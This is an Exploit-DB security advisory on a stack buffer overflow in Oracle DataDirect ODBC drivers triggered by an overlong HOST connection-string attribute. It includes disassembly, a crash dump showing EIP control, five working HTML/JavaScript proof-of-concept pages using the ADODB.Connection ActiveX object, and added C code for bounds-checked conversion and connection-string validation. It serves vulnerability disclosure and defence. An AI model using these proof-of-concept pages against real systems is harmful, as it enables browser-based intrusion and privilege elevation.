Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow
EDB-ID: 18007 CVE: N/A OSVDB-ID: N/A
Author: rgod Published: 2011-10-20 Verified:
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers
HOST Attribute Stack Based Buffer Overflow Vulnerability
tested against: Microsoft Windows 2k3 r2 sp2
Oracle Hyperion Performance Management and BI (v11.1.2.1.0)
download url of the Oracle Hyperion suite:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html
files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
Vulnerability:
The mentioned product installs various drivers that allow
the software to retrieve information from ODBC data sources.
Some of them are vulnerable to a remote stack-based buffer
overflow, which can be triggered by specifying an overlong
HOST attribute inside the connection string. The software
tries to do a Unicode/ASCII conversion of the attribute;
in doing so it completely smashes the stack, allowing the
execution flow to be redirected to a user-supplied buffer.
Analysis for (*) and errata corrige (too many nights awake):
When receiving the attribute, arsqls24.dll
does a Unicode/ASCII conversion; this fragment of code
counts the number of bytes needed and stores it in eax:
...
01D45C10 83C1 02 add ecx,2
01D45C13 83C0 01 add eax,1
01D45C16 66:8339 00 cmp word ptr ds:[ecx],0
01D45C1A ^75 F4 jnz short ARSQLS24.01D45C10
...
The next operation is a copy loop which moves the needed
bytes to a memory region pointed to by ecx, trusting the
eax counter:
...
01D48C36 8A16 mov dl,byte ptr ds:[esi]
01D48C38 83E8 01 sub eax,1
01D48C3B 8811 mov byte ptr ds:[ecx],dl
01D48C3D 83C1 01 add ecx,1
01D48C40 83C6 02 add esi,2
01D48C43 85C0 test eax,eax
01D48C45 ^75 EF jnz short ARSQLS24.01D48C36
...
The memory region pointed to by ecx is adjacent to critical
structures (stack pointers), so when the HOST attribute
is an overlong string the stack is partially overwritten
with user-supplied values. The result, after a few steps:
EAX FFFFFFFF
ECX 00000003
EDX 02B52E88
EBX 0013C720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013C720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013D1A4
ESI 02B56FF8
EDI 00000001
EIP 41414141
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0 0000 0000 0000 0000
MM1 0000 0000 0000 0000
MM2 0000 0000 0000 0000
MM3 0000 0000 0000 0000
MM4 0000 0000 0000 0000
MM5 0000 0000 0000 0000
MM6 8000 0000 0000 0000
MM7 FEE0 0000 0000 0000
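The two fragments above are a count loop followed by a copy loop that trusts the count and never consults the destination size. The C below is an added illustration written for this page; it is not code from arsqls24.dll or from Oracle/DataDirect. It reimplements the counting loop over a NUL-terminated UTF-16 string, then shows the narrowing copy with the one check the original lacks: comparing the count against the capacity of the destination before any byte is written. HOST_BUF_SIZE, the function names and the sample inputs (including the 666 x "AAAA" host that mirrors the PoC) are assumptions made for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from arsqls24.dll or from Oracle/DataDirect.
 * It models the two loops quoted in the advisory (a counting loop over a
 * NUL-terminated UTF-16 string, then a narrowing copy that trusts the count)
 * and adds the capacity check the copy loop lacks. HOST_BUF_SIZE, the
 * function names and the sample inputs are assumptions for the demo. */

#define HOST_BUF_SIZE 256   /* assumed fixed-size destination; a DNS hostname
                               is at most 253 bytes, so this is generous */

/* Counterpart of the first fragment: step one UTF-16 unit (two bytes) at a
 * time until the 16-bit terminator and count the units, i.e. the number of
 * narrow bytes needed. As in the original, nothing here knows the size of
 * the destination. */
size_t count_wide_units(const uint16_t *src)
{
    size_t n = 0;
    while (src[n] != 0)
        n++;
    return n;
}

/* Hardened counterpart of the second fragment. The original moves `count`
 * bytes into the destination unconditionally; here the count is compared
 * with the capacity (reserving one byte for the terminator) before any byte
 * is written. Each unit is narrowed to its low byte, which is exactly what
 * "mov dl, byte ptr [esi]" does on a little-endian UTF-16 string, so
 * non-ASCII host names are mangled rather than converted: a separate
 * correctness caveat, not the overflow. Returns bytes written, or -1 when
 * the input does not fit. */
long narrow_host_checked(char *dst, size_t dst_cap, const uint16_t *src)
{
    size_t n = count_wide_units(src);
    if (dst_cap == 0 || n > dst_cap - 1)
        return -1;      /* overlong HOST: refuse rather than truncate silently */
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)(src[i] & 0xFF);
    dst[n] = '\0';
    return (long)n;
}

/* Helper for constructed inputs: widen an ASCII string to UTF-16 units.
 * Returns units written (excluding the terminator) or -1 if out is too small. */
long ascii_to_utf16(uint16_t *out, size_t out_units, const char *s)
{
    size_t len = strlen(s);
    if (len + 1 > out_units)
        return -1;
    for (size_t i = 0; i < len; i++)
        out[i] = (uint16_t)(unsigned char)s[i];
    out[len] = 0;
    return (long)len;
}

/* Normal case: "localhost" converts and round-trips. Returns the byte
 * count, or -2 if the narrowed copy does not match. */
long demo_localhost(void)
{
    uint16_t wide[32];
    char narrow[HOST_BUF_SIZE];
    ascii_to_utf16(wide, 32, "localhost");
    long n = narrow_host_checked(narrow, sizeof narrow, wide);
    return (n == 9 && strcmp(narrow, "localhost") == 0) ? n : -2;
}

/* Overlong case shaped like the PoC: 666 x "AAAA" = 2664 'A's (constructed),
 * which the checked converter rejects instead of writing past the buffer. */
long demo_overlong_host(void)
{
    static uint16_t wide[4096];
    char narrow[HOST_BUF_SIZE];
    char longhost[2665];
    memset(longhost, 'A', 2664);
    longhost[2664] = '\0';
    ascii_to_utf16(wide, 4096, longhost);
    return narrow_host_checked(narrow, sizeof narrow, wide);
}

int main(void)
{
    printf("localhost  -> %ld bytes\n", demo_localhost());
    printf("2664 x 'A' -> %ld (rejected)\n", demo_overlong_host());
    return 0;
}
```

The fix is the single comparison before the loop; everything else is the same byte-by-byte narrowing the disassembly performs. Rejecting rather than truncating matters because a silently truncated hostname would connect to the wrong host, which is its own failure mode.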
poc:
The underlying operating system contains the ADODB.Connection
ActiveX control, which is marked safe for initialization
and safe for scripting (it implements the IObjectSafety interface)
and which could allow a remote attacker to specify the
mentioned connection string.
The IE security settings do not allow a connection to be opened
from another domain, but this can be used in conjunction
with an XSS vulnerability, connection string pollution or
SQL injection vulnerabilities, or through specific configuration
files. Note also that I am mentioning the ADODB object for pure
convenience: once installed, the ODBC drivers are available
system-wide, so this is a good basis for remote privilege elevations
of many kinds.
Note that Internet Explorer does not crash when trying to
execute EIP; attach a tool like faultmon to the IE sub-process.
(*)
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xxxxxx;UID=sa;PWD=null";
obj.Open();
</script>
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=" + x +";UID=system;PWD=XXXXXXXXX;";
obj.Open();
</script>
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<700;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>
//0.07 20/10/2011 - rgod
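Every PoC above reaches the driver through a connection string that an application assembled from input it did not control. The C below is an added example for this page, not part of the advisory and not Oracle/DataDirect code: a validator an application can run on an ODBC connection string before handing it to ADODB or the driver manager. It splits KEY=value pairs on ';', caps HOST at the DNS maximum of 253 bytes, caps every other value, and rejects a key that appears twice, which is the shape connection string pollution takes. The limits, the verdict names and the sample strings (including one shaped like the PoC, with a 666 x "AAAA" host) are assumptions; braced values ({...}) containing ';' are deliberately not handled to keep the parser short.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not part of the advisory and not Oracle/DataDirect code:
 * validate an ODBC connection string on the application side before it
 * reaches ADODB / the driver manager. Limits, verdict names and sample
 * strings are assumptions. Braced values ({...}) are not handled. */

#define MAX_HOST_LEN 253   /* DNS limit; far below any plausible driver buffer */
#define MAX_ATTR_LEN 512   /* assumed cap for any other attribute value */
#define MAX_PAIRS    32

enum cs_verdict {
    CS_OK = 0,
    CS_HOST_TOO_LONG,
    CS_ATTR_TOO_LONG,
    CS_DUPLICATE_KEY,
    CS_MALFORMED,
    CS_TOO_MANY_PAIRS
};

/* Case-insensitive comparison of two key slices (ODBC keys are
 * case-insensitive, so HOST and host name the same attribute). */
static int keys_equal(const char *a, size_t alen, const char *b, size_t blen)
{
    if (alen != blen)
        return 0;
    for (size_t i = 0; i < alen; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

enum cs_verdict validate_connection_string(const char *cs)
{
    const char *keys[MAX_PAIRS];
    size_t klens[MAX_PAIRS];
    int npairs = 0;
    const char *p = cs;

    while (*p) {
        const char *semi = strchr(p, ';');
        size_t seglen = semi ? (size_t)(semi - p) : strlen(p);
        if (seglen == 0) {          /* empty segment, e.g. a trailing ';' */
            p++;
            continue;
        }
        const char *eq = memchr(p, '=', seglen);
        if (eq == NULL || eq == p)  /* no '=' in the segment, or empty key */
            return CS_MALFORMED;
        size_t klen = (size_t)(eq - p);
        size_t vlen = seglen - klen - 1;

        /* pollution check: the same attribute given twice */
        for (int i = 0; i < npairs; i++)
            if (keys_equal(keys[i], klens[i], p, klen))
                return CS_DUPLICATE_KEY;
        if (npairs == MAX_PAIRS)
            return CS_TOO_MANY_PAIRS;
        keys[npairs] = p;
        klens[npairs] = klen;
        npairs++;

        /* length check: HOST gets the DNS limit, everything else the generic cap */
        if (keys_equal(p, klen, "HOST", 4)) {
            if (vlen > MAX_HOST_LEN)
                return CS_HOST_TOO_LONG;
        } else if (vlen > MAX_ATTR_LEN) {
            return CS_ATTR_TOO_LONG;
        }
        p += seglen;
        if (*p == ';')
            p++;
    }
    return CS_OK;
}

/* Constructed string with the same shape as the advisory's PoC:
 * HOST = 666 x "AAAA" (2664 bytes). Returns the verdict. */
enum cs_verdict demo_poc_shaped_string(void)
{
    static char cs[3072];
    strcpy(cs, "DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=");
    size_t n = strlen(cs);
    memset(cs + n, 'A', 2664);
    n += 2664;
    strcpy(cs + n, ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null");
    return validate_connection_string(cs);
}

int main(void)
{
    const char *good = "DRIVER=DataDirect 6.0 MySQL Wire Protocol;"
                       "HOST=db.example.internal;PORT=3306;DB=app;UID=app;PWD=secret;";
    printf("good string     -> %d (0 = CS_OK)\n", validate_connection_string(good));
    printf("PoC-shaped HOST -> %d (1 = CS_HOST_TOO_LONG)\n", demo_poc_shaped_string());
    printf("polluted HOST   -> %d (3 = CS_DUPLICATE_KEY)\n",
           validate_connection_string("HOST=db1;UID=app;host=evil"));
    return 0;
}
```

The HOST cap is the check that would have stopped every PoC on this page at the application boundary; the duplicate-key check covers the pollution case the advisory mentions, where a second HOST appended to an otherwise legitimate string wins or loses depending on the driver's parsing order. Neither replaces patching the driver, but both are cheap to enforce in the code that builds the string.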